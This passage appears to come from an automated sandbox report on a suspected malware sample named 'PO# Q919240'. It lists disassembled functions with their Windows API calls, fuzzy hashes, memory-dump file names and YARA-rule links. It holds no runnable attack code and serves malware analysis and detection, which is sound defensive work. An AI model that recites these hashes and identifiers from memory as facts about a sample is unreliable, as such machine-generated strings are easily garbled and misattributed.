                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                • _wcslen.LIBCMT ref: 0045F94A
                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                • String ID: 0
                • API String ID: 621800784-4108050209
                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SetErrorMode.KERNEL32 ref: 004781CE
                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • SetErrorMode.KERNEL32(?), ref: 00478270
                • SetErrorMode.KERNEL32(?), ref: 00478340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                • String ID: \VH
                • API String ID: 3884216118-234962358
                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                • IsMenu.USER32(?), ref: 0044854D
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                • DrawMenuBar.USER32 ref: 004485AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 1589278365-1403004172
                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcsncpy.LIBCMT ref: 00401C41
                • _wcscpy.LIBCMT ref: 00401C5D
                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                • String ID: Line:
                • API String ID: 1874344091-1585850449
                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: SysAnimate32
                • API String ID: 0-1011021900
                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                • GetFocus.USER32 ref: 0046157B
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                • __swprintf.LIBCMT ref: 00461608
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                • String ID: %s%d
                • API String ID: 2645982514-1110647743
                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$CloseCountersCurrentHandleOpen
                • String ID:
                • API String ID: 3488606520-0
                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc$Library$FreeLoad
                • String ID:
                • API String ID: 2449869053-0
                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 004563A6
                • ScreenToClient.USER32(?,?), ref: 004563C3
                • GetAsyncKeyState.USER32(?), ref: 00456400
                • GetAsyncKeyState.USER32(?), ref: 00456410
                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AsyncState$ClientCursorLongScreenWindow
                • String ID:
                • API String ID: 3539004672-0
                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                • Sleep.KERNEL32(0000000A), ref: 0047D455
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID:
                • API String ID: 327565842-0
                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                Download Yara Rule
                APIs
